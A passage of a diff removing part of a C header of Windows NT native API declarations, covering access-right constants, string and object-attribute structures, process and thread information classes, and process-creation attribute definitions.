- WORKER_FACTORY_WAIT | \
- WORKER_FACTORY_SET_INFORMATION | \
- WORKER_FACTORY_QUERY_INFORMATION | \
- WORKER_FACTORY_READY_WORKER | \
- WORKER_FACTORY_SHUTDOWN \
- )
-
-//
-// Type Object Access Rights
-//
-#define OBJECT_TYPE_CREATE (0x0001)
-#define OBJECT_TYPE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | OBJECT_TYPE_CREATE)
-
-//
-// WMI Object Access Rights
-//
-#define WMIGUID_QUERY 0x0001
-#define WMIGUID_SET 0x0002
-#define WMIGUID_NOTIFICATION 0x0004
-#define WMIGUID_READ_DESCRIPTION 0x0008
-#define WMIGUID_EXECUTE 0x0010
-#define TRACELOG_CREATE_REALTIME 0x0020
-#define TRACELOG_CREATE_ONDISK 0x0040
-#define TRACELOG_GUID_ENABLE 0x0080
-#define TRACELOG_ACCESS_KERNEL_LOGGER 0x0100
-#define TRACELOG_CREATE_INPROC 0x0200
-#define TRACELOG_ACCESS_REALTIME 0x0400
-#define TRACELOG_REGISTER_GUIDS 0x0800
-
-//
-// Memory Partition Object Access Rights
-//
-#define MEMORY_PARTITION_QUERY_ACCESS 0x0001
-#define MEMORY_PARTITION_MODIFY_ACCESS 0x0002
-
-#define MEMORY_PARTITION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | \
- SYNCHRONIZE | \
- MEMORY_PARTITION_QUERY_ACCESS | \
- MEMORY_PARTITION_MODIFY_ACCESS)
-
-//
-// NtCreateProcessEx specific flags.
-// -#define PS_REQUEST_BREAKAWAY 1 -#define PS_NO_DEBUG_INHERIT 2 -#define PS_INHERIT_HANDLES 4 -#define PS_LARGE_PAGES 8 -#define PS_ALL_FLAGS (PS_REQUEST_BREAKAWAY | \ - PS_NO_DEBUG_INHERIT | \ - PS_INHERIT_HANDLES | \ - PS_LARGE_PAGES) - -// -// Define special ByteOffset parameters for read and write operations -// -#define FILE_WRITE_TO_END_OF_FILE 0xffffffff -#define FILE_USE_FILE_POINTER_POSITION 0xfffffffe - -// -// This is the maximum MaximumLength for a UNICODE_STRING. -// -#define MAXUSHORT 0xffff -#define MAX_USTRING ( sizeof(WCHAR) * (MAXUSHORT/sizeof(WCHAR)) ) - -typedef struct _EX_RUNDOWN_REF { - union - { - ULONG Count; - PVOID Ptr; - }; -} EX_RUNDOWN_REF, *PEX_RUNDOWN_REF; - -#ifdef _WIN64 -#define MAX_FAST_REFS 15 -#else -#define MAX_FAST_REFS 7 -#endif - -typedef struct _EX_FAST_REF { - union { - PVOID Object; -#if defined (_WIN64) - ULONG_PTR RefCnt : 4; -#else - ULONG_PTR RefCnt : 3; -#endif - ULONG_PTR Value; - }; -} EX_FAST_REF, *PEX_FAST_REF; - -typedef struct _UNICODE_STRING { - USHORT Length; - USHORT MaximumLength; - PWSTR Buffer; -} UNICODE_STRING; -typedef UNICODE_STRING *PUNICODE_STRING; -typedef const UNICODE_STRING *PCUNICODE_STRING; - -#ifndef STATIC_UNICODE_STRING -#define STATIC_UNICODE_STRING(string, value) \ - static UNICODE_STRING string = { sizeof(value) - sizeof(WCHAR), sizeof(value), value }; -#endif - -typedef struct _STRING { - USHORT Length; - USHORT MaximumLength; - PCHAR Buffer; -} STRING; -typedef STRING *PSTRING; - -typedef STRING ANSI_STRING; -typedef PSTRING PANSI_STRING; - -typedef STRING OEM_STRING; -typedef PSTRING POEM_STRING; -typedef CONST STRING* PCOEM_STRING; -typedef CONST char *PCSZ; - -typedef struct _CSTRING { - USHORT Length; - USHORT MaximumLength; - CONST char *Buffer; -} CSTRING; -typedef CSTRING *PCSTRING; -#define ANSI_NULL ((CHAR)0) - -typedef STRING CANSI_STRING; -typedef PSTRING PCANSI_STRING; - -typedef struct _OBJECT_ATTRIBUTES { - ULONG Length; - HANDLE RootDirectory; - PUNICODE_STRING 
ObjectName; - ULONG Attributes; - PVOID SecurityDescriptor; - PVOID SecurityQualityOfService; -} OBJECT_ATTRIBUTES; -typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES; - -typedef struct _IO_STATUS_BLOCK { - union { - NTSTATUS Status; - PVOID Pointer; - } DUMMYUNIONNAME; - - ULONG_PTR Information; -} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; - -/* -** FileCache and MemoryList START -*/ - -typedef enum _SYSTEM_MEMORY_LIST_COMMAND { - MemoryCaptureAccessedBits, - MemoryCaptureAndResetAccessedBits, - MemoryEmptyWorkingSets, - MemoryFlushModifiedList, - MemoryPurgeStandbyList, - MemoryPurgeLowPriorityStandbyList, - MemoryCommandMax -} SYSTEM_MEMORY_LIST_COMMAND; - -typedef struct _SYSTEM_FILECACHE_INFORMATION { - SIZE_T CurrentSize; - SIZE_T PeakSize; - ULONG PageFaultCount; - SIZE_T MinimumWorkingSet; - SIZE_T MaximumWorkingSet; - SIZE_T CurrentSizeIncludingTransitionInPages; - SIZE_T PeakSizeIncludingTransitionInPages; - ULONG TransitionRePurposeCount; - ULONG Flags; -} SYSTEM_FILECACHE_INFORMATION, *PSYSTEM_FILECACHE_INFORMATION; - -/* -** FileCache and MemoryList END -*/ - -/* -** Processes START -*/ - -typedef struct _SYSTEM_TIMEOFDAY_INFORMATION { - LARGE_INTEGER BootTime; - LARGE_INTEGER CurrentTime; - LARGE_INTEGER TimeZoneBias; - ULONG TimeZoneId; - ULONG Reserved; - ULONGLONG BootTimeBias; - ULONGLONG SleepTimeBias; -} SYSTEM_TIMEOFDAY_INFORMATION, *PSYSTEM_TIMEOFDAY_INFORMATION; - -typedef enum _THREAD_STATE { - StateInitialized, - StateReady, - StateRunning, - StateStandby, - StateTerminated, - StateWait, - StateTransition, - StateUnknown -} THREAD_STATE; - -typedef enum _KWAIT_REASON { - Executive, - FreePage, - PageIn, - PoolAllocation, - DelayExecution, - Suspended, - UserRequest, - WrExecutive, - WrFreePage, - WrPageIn, - WrPoolAllocation, - WrDelayExecution, - WrSuspended, - WrUserRequest, - WrEventPair, - WrQueue, - WrLpcReceive, - WrLpcReply, - WrVirtualMemory, - WrPageOut, - WrRendezvous, - WrKeyedEvent, - WrTerminated, - WrProcessInSwap, - WrCpuRateControl, - 
WrCalloutStack, - WrKernel, - WrResource, - WrPushLock, - WrMutex, - WrQuantumEnd, - WrDispatchInt, - WrPreempted, - WrYieldExecution, - WrFastMutex, - WrGuardedMutex, - WrRundown, - WrAlertByThreadId, - WrDeferredPreempt, - MaximumWaitReason -} KWAIT_REASON; - -typedef VOID KSTART_ROUTINE( - _In_ PVOID StartContext -); -typedef KSTART_ROUTINE *PKSTART_ROUTINE; - -typedef struct _CLIENT_ID { - HANDLE UniqueProcess; - HANDLE UniqueThread; -} CLIENT_ID, *PCLIENT_ID; - -typedef struct _CLIENT_ID64 { - ULONG64 UniqueProcess; - ULONG64 UniqueThread; -} CLIENT_ID64, *PCLIENT_ID64; - -typedef struct _CLIENT_ID32 { - ULONG32 UniqueProcess; - ULONG32 UniqueThread; -} CLIENT_ID32, *PCLIENT_ID32; - -typedef struct _VM_COUNTERS { - SIZE_T PeakVirtualSize; - SIZE_T VirtualSize; - ULONG PageFaultCount; - SIZE_T PeakWorkingSetSize; - SIZE_T WorkingSetSize; - SIZE_T QuotaPeakPagedPoolUsage; - SIZE_T QuotaPagedPoolUsage; - SIZE_T QuotaPeakNonPagedPoolUsage; - SIZE_T QuotaNonPagedPoolUsage; - SIZE_T PagefileUsage; - SIZE_T PeakPagefileUsage; - SIZE_T PrivatePageCount; -} VM_COUNTERS; - -typedef struct _SYSTEM_THREAD_INFORMATION { - LARGE_INTEGER KernelTime; - LARGE_INTEGER UserTime; - LARGE_INTEGER CreateTime; - ULONG WaitTime; - PVOID StartAddress; - CLIENT_ID ClientId; - KPRIORITY Priority; - KPRIORITY BasePriority; - ULONG ContextSwitchCount; - THREAD_STATE State; - KWAIT_REASON WaitReason; -} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION; - -typedef struct _SYSTEM_EXTENDED_THREAD_INFORMATION { - SYSTEM_THREAD_INFORMATION ThreadInfo; - PVOID StackBase; - PVOID StackLimit; - PVOID Win32StartAddress; - PVOID TebBase; - ULONG_PTR Reserved2; - ULONG_PTR Reserved3; - ULONG_PTR Reserved4; -} SYSTEM_EXTENDED_THREAD_INFORMATION, *PSYSTEM_EXTENDED_THREAD_INFORMATION; - -typedef struct _SYSTEM_PROCESSES_INFORMATION { - ULONG NextEntryDelta; - ULONG ThreadCount; - LARGE_INTEGER SpareLi1; - LARGE_INTEGER SpareLi2; - LARGE_INTEGER SpareLi3; - LARGE_INTEGER CreateTime; - LARGE_INTEGER 
UserTime; - LARGE_INTEGER KernelTime; - UNICODE_STRING ImageName; - KPRIORITY BasePriority; - HANDLE UniqueProcessId; - HANDLE InheritedFromUniqueProcessId; - ULONG HandleCount; - ULONG SessionId; - ULONG_PTR PageDirectoryBase; - VM_COUNTERS VmCounters; - IO_COUNTERS IoCounters; - SYSTEM_THREAD_INFORMATION Threads[1]; -} SYSTEM_PROCESSES_INFORMATION, *PSYSTEM_PROCESSES_INFORMATION; - -typedef enum _SYSTEM_PROCESS_CLASSIFICATION { - SystemProcessClassificationNormal, - SystemProcessClassificationSystem, - SystemProcessClassificationSecureSystem, - SystemProcessClassificationMemCompression, - SystemProcessClassificationRegistry, - SystemProcessClassificationMaximum -} SYSTEM_PROCESS_CLASSIFICATION; - -typedef struct _PROCESS_DISK_COUNTERS { - ULONGLONG BytesRead; - ULONGLONG BytesWritten; - ULONGLONG ReadOperationCount; - ULONGLONG WriteOperationCount; - ULONGLONG FlushOperationCount; -} PROCESS_DISK_COUNTERS, *PPROCESS_DISK_COUNTERS; - -typedef union _ENERGY_STATE_DURATION { - union - { - ULONGLONG Value; - ULONG LastChangeTime; - }; - - ULONG Duration : 31; - ULONG IsInState : 1; -} ENERGY_STATE_DURATION, *PENERGY_STATE_DURATION; - -typedef struct _PROCESS_ENERGY_VALUES { - ULONGLONG Cycles[2][4]; - ULONGLONG DiskEnergy; - ULONGLONG NetworkTailEnergy; - ULONGLONG MBBTailEnergy; - ULONGLONG NetworkTxRxBytes; - ULONGLONG MBBTxRxBytes; - union - { - ENERGY_STATE_DURATION Durations[3]; - struct - { - ENERGY_STATE_DURATION ForegroundDuration; - ENERGY_STATE_DURATION DesktopVisibleDuration; - ENERGY_STATE_DURATION PSMForegroundDuration; - }; - }; - ULONG CompositionRendered; - ULONG CompositionDirtyGenerated; - ULONG CompositionDirtyPropagated; - ULONG Reserved1; - ULONGLONG AttributedCycles[4][2]; - ULONGLONG WorkOnBehalfCycles[4][2]; -} PROCESS_ENERGY_VALUES, *PPROCESS_ENERGY_VALUES; - -typedef struct _SYSTEM_PROCESS_INFORMATION_EXTENSION { - PROCESS_DISK_COUNTERS DiskCounters; - ULONGLONG ContextSwitches; - union - { - ULONG Flags; - struct - { - ULONG HasStrongId : 
1; - ULONG Classification : 4; // SYSTEM_PROCESS_CLASSIFICATION - ULONG BackgroundActivityModerated : 1; - ULONG Spare : 26; - }; - }; - ULONG UserSidOffset; - ULONG PackageFullNameOffset; - PROCESS_ENERGY_VALUES EnergyValues; - ULONG AppIdOffset; - SIZE_T SharedCommitCharge; - ULONG JobObjectId; - ULONG SpareUlong; - ULONGLONG ProcessSequenceNumber; -} SYSTEM_PROCESS_INFORMATION_EXTENSION, *PSYSTEM_PROCESS_INFORMATION_EXTENSION; - -typedef struct _SYSTEM_PROCESSES_FULL_INFORMATION { - SYSTEM_PROCESSES_INFORMATION ProcessAndThreads; - SYSTEM_PROCESS_INFORMATION_EXTENSION ExtendedInfo; -} SYSTEM_PROCESSES_FULL_INFORMATION, *PSYSTEM_PROCESSES_FULL_INFORMATION; - -typedef struct _SYSTEM_PROCESS_ID_INFORMATION { - HANDLE ProcessId; - UNICODE_STRING ImageName; -} SYSTEM_PROCESS_ID_INFORMATION, *PSYSTEM_PROCESS_ID_INFORMATION; - -typedef struct _SYSTEM_SECUREBOOT_INFORMATION { - BOOLEAN SecureBootEnabled; - BOOLEAN SecureBootCapable; -} SYSTEM_SECUREBOOT_INFORMATION, *PSYSTEM_SECUREBOOT_INFORMATION; - -typedef struct _SYSTEM_SECUREBOOT_POLICY_INFORMATION { - GUID PolicyPublisher; - ULONG PolicyVersion; - ULONG PolicyOptions; -} SYSTEM_SECUREBOOT_POLICY_INFORMATION, *PSYSTEM_SECUREBOOT_POLICY_INFORMATION; - -typedef struct _SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION { - SYSTEM_SECUREBOOT_POLICY_INFORMATION PolicyInformation; - ULONG PolicySize; - UCHAR Policy[1]; -} SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION, *PSYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION; - -typedef struct _SYSTEM_BASIC_INFORMATION { - ULONG Reserved; - ULONG TimerResolution; - ULONG PageSize; - ULONG NumberOfPhysicalPages; - ULONG LowestPhysicalPageNumber; - ULONG HighestPhysicalPageNumber; - ULONG AllocationGranularity; - ULONG_PTR MinimumUserModeAddress; - ULONG_PTR MaximumUserModeAddress; - ULONG_PTR ActiveProcessorsAffinityMask; - CCHAR NumberOfProcessors; -} SYSTEM_BASIC_INFORMATION, *PSYSTEM_BASIC_INFORMATION; - -typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION { - BOOLEAN SecureKernelRunning : 1; 
- BOOLEAN HvciEnabled : 1; - BOOLEAN HvciStrictMode : 1; - BOOLEAN DebugEnabled : 1; - BOOLEAN FirmwarePageProtection : 1; - BOOLEAN SpareFlags : 1; - BOOLEAN TrustletRunning : 1; - BOOLEAN SpareFlags2 : 1; - BOOLEAN Spare0[6]; - ULONGLONG Spare1; -} SYSTEM_ISOLATED_USER_MODE_INFORMATION, *PSYSTEM_ISOLATED_USER_MODE_INFORMATION; - -typedef enum _PROCESSINFOCLASS { - ProcessBasicInformation = 0, - ProcessQuotaLimits = 1, - ProcessIoCounters = 2, - ProcessVmCounters = 3, - ProcessTimes = 4, - ProcessBasePriority = 5, - ProcessRaisePriority = 6, - ProcessDebugPort = 7, - ProcessExceptionPort = 8, - ProcessAccessToken = 9, - ProcessLdtInformation = 10, - ProcessLdtSize = 11, - ProcessDefaultHardErrorMode = 12, - ProcessIoPortHandlers = 13, - ProcessPooledUsageAndLimits = 14, - ProcessWorkingSetWatch = 15, - ProcessUserModeIOPL = 16, - ProcessEnableAlignmentFaultFixup = 17, - ProcessPriorityClass = 18, - ProcessWx86Information = 19, - ProcessHandleCount = 20, - ProcessAffinityMask = 21, - ProcessPriorityBoost = 22, - ProcessDeviceMap = 23, - ProcessSessionInformation = 24, - ProcessForegroundInformation = 25, - ProcessWow64Information = 26, - ProcessImageFileName = 27, - ProcessLUIDDeviceMapsEnabled = 28, - ProcessBreakOnTermination = 29, - ProcessDebugObjectHandle = 30, - ProcessDebugFlags = 31, - ProcessHandleTracing = 32, - ProcessIoPriority = 33, - ProcessExecuteFlags = 34, - ProcessTlsInformation = 35, - ProcessCookie = 36, - ProcessImageInformation = 37, - ProcessCycleTime = 38, - ProcessPagePriority = 39, - ProcessInstrumentationCallback = 40, - ProcessThreadStackAllocation = 41, - ProcessWorkingSetWatchEx = 42, - ProcessImageFileNameWin32 = 43, - ProcessImageFileMapping = 44, - ProcessAffinityUpdateMode = 45, - ProcessMemoryAllocationMode = 46, - ProcessGroupInformation = 47, - ProcessTokenVirtualizationEnabled = 48, - ProcessOwnerInformation = 49, - ProcessWindowInformation = 50, - ProcessHandleInformation = 51, - ProcessMitigationPolicy = 52, - 
ProcessDynamicFunctionTableInformation = 53, - ProcessHandleCheckingMode = 54, - ProcessKeepAliveCount = 55, - ProcessRevokeFileHandles = 56, - ProcessWorkingSetControl = 57, - ProcessHandleTable = 58, - ProcessCheckStackExtentsMode = 59, - ProcessCommandLineInformation = 60, - ProcessProtectionInformation = 61, - ProcessMemoryExhaustion = 62, - ProcessFaultInformation = 63, - ProcessTelemetryIdInformation = 64, - ProcessCommitReleaseInformation = 65, - ProcessDefaultCpuSetsInformation = 66, - ProcessAllowedCpuSetsInformation = 67, - ProcessSubsystemProcess = 68, - ProcessJobMemoryInformation = 69, - ProcessInPrivate = 70, - ProcessRaiseUMExceptionOnInvalidHandleClose = 71, - ProcessIumChallengeResponse = 72, - ProcessChildProcessInformation = 73, - ProcessHighGraphicsPriorityInformation = 74, - ProcessSubsystemInformation = 75, - ProcessEnergyValues = 76, - ProcessActivityThrottleState = 77, - ProcessActivityThrottlePolicy = 78, - ProcessWin32kSyscallFilterInformation = 79, - ProcessDisableSystemAllowedCpuSets = 80, - ProcessWakeInformation = 81, - ProcessEnergyTrackingState = 82, - ProcessManageWritesToExecutableMemory = 83, - ProcessCaptureTrustletLiveDump = 84, - ProcessTelemetryCoverage = 85, - ProcessEnclaveInformation = 86, - ProcessEnableReadWriteVmLogging = 87, - ProcessUptimeInformation = 88, - ProcessImageSection = 89, - ProcessDebugAuthInformation = 90, - ProcessSystemResourceManagement = 91, - ProcessSequenceNumber = 92, - ProcessLoaderDetour = 93, - ProcessSecurityDomainInformation = 93, - ProcessCombineSecurityDomainsInformation = 94, - ProcessEnableLogging = 95, - ProcessLeapSecondInformation = 96, - MaxProcessInfoClass -} PROCESSINFOCLASS; - -typedef enum _THREADINFOCLASS { - ThreadBasicInformation, - ThreadTimes, - ThreadPriority, - ThreadBasePriority, - ThreadAffinityMask, - ThreadImpersonationToken, - ThreadDescriptorTableEntry, - ThreadEnableAlignmentFaultFixup, - ThreadEventPair, - ThreadQuerySetWin32StartAddress, - ThreadZeroTlsCell, - 
ThreadPerformanceCount, - ThreadAmILastThread, - ThreadIdealProcessor, - ThreadPriorityBoost, - ThreadSetTlsArrayAddress, - ThreadIsIoPending, - ThreadHideFromDebugger, - ThreadBreakOnTermination, - ThreadSwitchLegacyState, - ThreadIsTerminated, - ThreadLastSystemCall, - ThreadIoPriority, - ThreadCycleTime, - ThreadPagePriority, - ThreadActualBasePriority, - ThreadTebInformation, - ThreadCSwitchMon, - ThreadCSwitchPmu, - ThreadWow64Context, - ThreadGroupInformation, - ThreadUmsInformation, - ThreadCounterProfiling, - ThreadIdealProcessorEx, - ThreadCpuAccountingInformation, - ThreadSuspendCount, - ThreadHeterogeneousCpuPolicy, - ThreadContainerId, - ThreadNameInformation, - ThreadSelectedCpuSets, - ThreadSystemThreadInformation, - ThreadActualGroupAffinity, - ThreadDynamicCodePolicyInfo, - ThreadExplicitCaseSensitivity, - ThreadWorkOnBehalfTicket, - ThreadSubsystemInformation, - ThreadDbgkWerReportActive, - ThreadAttachContainer, - ThreadManageWritesToExecutableMemory, - ThreadPowerThrottlingState, - ThreadWorkloadClass, - MaxThreadInfoClass -} THREADINFOCLASS; - -typedef struct _PROCESS_BASIC_INFORMATION { - NTSTATUS ExitStatus; - PVOID PebBaseAddress; - ULONG_PTR AffinityMask; - KPRIORITY BasePriority; - ULONG_PTR UniqueProcessId; - ULONG_PTR InheritedFromUniqueProcessId; -} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION; - -typedef struct _THREAD_BASIC_INFORMATION { - NTSTATUS ExitStatus; - PVOID TebBaseAddress; - CLIENT_ID ClientId; - ULONG_PTR AffinityMask; - KPRIORITY Priority; - LONG BasePriority; -} THREAD_BASIC_INFORMATION, *PTHREAD_BASIC_INFORMATION; - -typedef struct _PROCESS_EXTENDED_BASIC_INFORMATION { - SIZE_T Size; - PROCESS_BASIC_INFORMATION BasicInfo; - union - { - ULONG Flags; - struct - { - ULONG IsProtectedProcess : 1; - ULONG IsWow64Process : 1; - ULONG IsProcessDeleting : 1; - ULONG IsCrossSessionCreate : 1; - ULONG IsFrozen : 1; - ULONG IsBackground : 1; - ULONG IsStronglyNamed : 1; - ULONG IsSecureProcess : 1; - ULONG 
IsSubsystemProcess : 1;
- ULONG SpareBits : 23;
- } DUMMYSTRUCTNAME;
- } DUMMYUNIONNAME;
-} PROCESS_EXTENDED_BASIC_INFORMATION, *PPROCESS_EXTENDED_BASIC_INFORMATION;
-
-typedef struct _PROCESS_ACCESS_TOKEN {
- HANDLE Token;
- HANDLE Thread;
-} PROCESS_ACCESS_TOKEN, *PPROCESS_ACCESS_TOKEN;
-
-typedef struct _PROCESS_HANDLE_TABLE_ENTRY_INFO {
- HANDLE HandleValue;
- ULONG_PTR HandleCount;
- ULONG_PTR PointerCount;
- ULONG GrantedAccess;
- ULONG ObjectTypeIndex;
- ULONG HandleAttributes;
- ULONG Reserved;
-} PROCESS_HANDLE_TABLE_ENTRY_INFO, *PPROCESS_HANDLE_TABLE_ENTRY_INFO;
-
-typedef struct _PROCESS_HANDLE_SNAPSHOT_INFORMATION {
- ULONG NumberOfHandles;
- ULONG Reserved;
- PROCESS_HANDLE_TABLE_ENTRY_INFO Handles[1];
-} PROCESS_HANDLE_SNAPSHOT_INFORMATION, *PPROCESS_HANDLE_SNAPSHOT_INFORMATION;
-
-typedef enum _PS_MITIGATION_OPTION {
- PS_MITIGATION_OPTION_NX,
- PS_MITIGATION_OPTION_SEHOP,
- PS_MITIGATION_OPTION_FORCE_RELOCATE_IMAGES,
- PS_MITIGATION_OPTION_HEAP_TERMINATE,
- PS_MITIGATION_OPTION_BOTTOM_UP_ASLR,
- PS_MITIGATION_OPTION_HIGH_ENTROPY_ASLR,
- PS_MITIGATION_OPTION_STRICT_HANDLE_CHECKS,
- PS_MITIGATION_OPTION_WIN32K_SYSTEM_CALL_DISABLE,
- PS_MITIGATION_OPTION_EXTENSION_POINT_DISABLE,
- PS_MITIGATION_OPTION_PROHIBIT_DYNAMIC_CODE,
- PS_MITIGATION_OPTION_CONTROL_FLOW_GUARD,
- PS_MITIGATION_OPTION_BLOCK_NON_MICROSOFT_BINARIES,
- PS_MITIGATION_OPTION_FONT_DISABLE,
- PS_MITIGATION_OPTION_IMAGE_LOAD_NO_REMOTE,
- PS_MITIGATION_OPTION_IMAGE_LOAD_NO_LOW_LABEL,
- PS_MITIGATION_OPTION_IMAGE_LOAD_PREFER_SYSTEM32,
- PS_MITIGATION_OPTION_RETURN_FLOW_GUARD,
- PS_MITIGATION_OPTION_LOADER_INTEGRITY_CONTINUITY,
- PS_MITIGATION_OPTION_STRICT_CONTROL_FLOW_GUARD,
- PS_MITIGATION_OPTION_RESTRICT_SET_THREAD_CONTEXT,
- PS_MITIGATION_OPTION_ROP_STACKPIVOT,
- PS_MITIGATION_OPTION_ROP_CALLER_CHECK,
- PS_MITIGATION_OPTION_ROP_SIMEXEC,
- PS_MITIGATION_OPTION_EXPORT_ADDRESS_FILTER,
- PS_MITIGATION_OPTION_EXPORT_ADDRESS_FILTER_PLUS,
- PS_MITIGATION_OPTION_RESTRICT_CHILD_PROCESS_CREATION,
- PS_MITIGATION_OPTION_IMPORT_ADDRESS_FILTER,
- PS_MITIGATION_OPTION_MODULE_TAMPERING_PROTECTION,
- PS_MITIGATION_OPTION_RESTRICT_INDIRECT_BRANCH_PREDICTION,
- PS_MITIGATION_OPTION_SPECULATIVE_STORE_BYPASS_DISABLE,
- PS_MITIGATION_OPTION_ALLOW_DOWNGRADE_DYNAMIC_CODE_POLICY,
- PS_MITIGATION_OPTION_CET_SHADOW_STACKS
-} PS_MITIGATION_OPTION;
-
-typedef enum _PS_CREATE_STATE {
- PsCreateInitialState,
- PsCreateFailOnFileOpen,
- PsCreateFailOnSectionCreate,
- PsCreateFailExeFormat,
- PsCreateFailMachineMismatch,
- PsCreateFailExeName,
- PsCreateSuccess,
- PsCreateMaximumStates
-} PS_CREATE_STATE;
-
-typedef struct _PS_CREATE_INFO {
- SIZE_T Size;
- PS_CREATE_STATE State;
- union
- {
- struct
- {
- union
- {
- ULONG InitFlags;
- struct
- {
- UCHAR WriteOutputOnExit : 1;
- UCHAR DetectManifest : 1;
- UCHAR IFEOSkipDebugger : 1;
- UCHAR IFEODoNotPropagateKeyState : 1;
- UCHAR SpareBits1 : 4;
- UCHAR SpareBits2 : 8;
- USHORT ProhibitedImageCharacteristics : 16;
- };
- };
- ACCESS_MASK AdditionalFileAccess;
- } InitState;
-
- struct
- {
- HANDLE FileHandle;
- } FailSection;
-
- struct
- {
- USHORT DllCharacteristics;
- } ExeFormat;
-
- struct
- {
- HANDLE IFEOKey;
- } ExeName;
-
- struct
- {
- union
- {
- ULONG OutputFlags;
- struct
- {
- UCHAR ProtectedProcess : 1;
- UCHAR AddressSpaceOverride : 1;
- UCHAR DevOverrideEnabled : 1;
- UCHAR ManifestDetected : 1;
- UCHAR ProtectedProcessLight : 1;
- UCHAR SpareBits1 : 3;
- UCHAR SpareBits2 : 8;
- USHORT SpareBits3 : 16;
- };
- };
- HANDLE FileHandle;
- HANDLE SectionHandle;
- ULONGLONG UserProcessParametersNative;
- ULONG UserProcessParametersWow64;
- ULONG CurrentParameterFlags;
- ULONGLONG PebAddressNative;
- ULONG PebAddressWow64;
- ULONGLONG ManifestAddress;
- ULONG ManifestSize;
- } SuccessState;
- };
-} PS_CREATE_INFO, *PPS_CREATE_INFO;
-
-typedef struct _PS_ATTRIBUTE {
- ULONG Attribute;
- SIZE_T Size;
- union
- {
- ULONG Value;
- PVOID ValuePtr;
- };
- PSIZE_T ReturnLength;
-} PS_ATTRIBUTE, *PPS_ATTRIBUTE;
-
-typedef 
struct _PS_ATTRIBUTE_LIST {
- SIZE_T TotalLength;
- PS_ATTRIBUTE Attributes[1];
-} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;
-
-typedef enum _PS_PROTECTED_TYPE {
- PsProtectedTypeNone,
- PsProtectedTypeProtectedLight,
- PsProtectedTypeProtected,
- PsProtectedTypeMax
-} PS_PROTECTED_TYPE;
-
-typedef enum _PS_PROTECTED_SIGNER {
- PsProtectedSignerNone,
- PsProtectedSignerAuthenticode,
- PsProtectedSignerCodeGen,
- PsProtectedSignerAntimalware,
- PsProtectedSignerLsa,
- PsProtectedSignerWindows,
- PsProtectedSignerWinTcb,
- PsProtectedSignerWinSystem,
- PsProtectedSignerApp,
- PsProtectedSignerMax
-} PS_PROTECTED_SIGNER;
-
-typedef struct _PS_PROTECTION {
- union
- {
- UCHAR Level;
- struct
- {
- UCHAR Type : 3;
- UCHAR Audit : 1;
- UCHAR Signer : 4;
- };
- };
-} PS_PROTECTION, *PPS_PROTECTION;
-
-// begin_rev
-#define PS_ATTRIBUTE_NUMBER_MASK 0x0000ffff
-#define PS_ATTRIBUTE_THREAD 0x00010000
-#define PS_ATTRIBUTE_INPUT 0x00020000
-#define PS_ATTRIBUTE_ADDITIVE 0x00040000
-// end_rev
-
-typedef enum _PS_ATTRIBUTE_NUM {
- PsAttributeParentProcess,
- PsAttributeDebugPort,
- PsAttributeToken,
- PsAttributeClientId,
- PsAttributeTebAddress,
- PsAttributeImageName,
- PsAttributeImageInfo,
- PsAttributeMemoryReserve,
- PsAttributePriorityClass,
- PsAttributeErrorMode,
- PsAttributeStdHandleInfo,
- PsAttributeHandleList,
- PsAttributeGroupAffinity,
- PsAttributePreferredNode,
- PsAttributeIdealProcessor,
- PsAttributeUmsThread,
- PsAttributeMitigationOptions,
- PsAttributeProtectionLevel,
- PsAttributeSecureProcess,
- PsAttributeJobList,
- PsAttributeChildProcessPolicy,
- PsAttributeAllApplicationPackagesPolicy,
- PsAttributeWin32kFilter,
- PsAttributeSafeOpenPromptOriginClaim,
- PsAttributeBnoIsolation,
- PsAttributeDesktopAppPolicy,
- PsAttributeChpe,
- PsAttributeMax
-} PS_ATTRIBUTE_NUM;
-
-#define PsAttributeValue(Number, Thread, Input, Unknown) \
- (((Number) & PS_ATTRIBUTE_NUMBER_MASK) | \
- ((Thread) ? PS_ATTRIBUTE_THREAD : 0) | \
- ((Input) ? 
PS_ATTRIBUTE_INPUT : 0) | \
- ((Unknown) ? PS_ATTRIBUTE_ADDITIVE : 0))
-
-#define PS_ATTRIBUTE_PARENT_PROCESS \
- PsAttributeValue(PsAttributeParentProcess, FALSE, TRUE, TRUE)
-#define PS_ATTRIBUTE_DEBUG_PORT \
- PsAttributeValue(PsAttributeDebugPort, FALSE, TRUE, TRUE)
-#define PS_ATTRIBUTE_TOKEN \
- PsAttributeValue(PsAttributeToken, FALSE, TRUE, TRUE)
-#define PS_ATTRIBUTE_CLIENT_ID \
- PsAttributeValue(PsAttributeClientId, TRUE, FALSE, FALSE)
-#define PS_ATTRIBUTE_TEB_ADDRESS \
- PsAttributeValue(PsAttributeTebAddress, TRUE, FALSE, FALSE)
-#define PS_ATTRIBUTE_IMAGE_NAME \
- PsAttributeValue(PsAttributeImageName, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_IMAGE_INFO \
- PsAttributeValue(PsAttributeImageInfo, FALSE, FALSE, FALSE)
-#define PS_ATTRIBUTE_MEMORY_RESERVE \
- PsAttributeValue(PsAttributeMemoryReserve, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_PRIORITY_CLASS \
- PsAttributeValue(PsAttributePriorityClass, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_ERROR_MODE \
- PsAttributeValue(PsAttributeErrorMode, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_STD_HANDLE_INFO \
- PsAttributeValue(PsAttributeStdHandleInfo, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_HANDLE_LIST \
- PsAttributeValue(PsAttributeHandleList, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_GROUP_AFFINITY \
- PsAttributeValue(PsAttributeGroupAffinity, TRUE, TRUE, FALSE)
-#define PS_ATTRIBUTE_PREFERRED_NODE \
- PsAttributeValue(PsAttributePreferredNode, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_IDEAL_PROCESSOR \
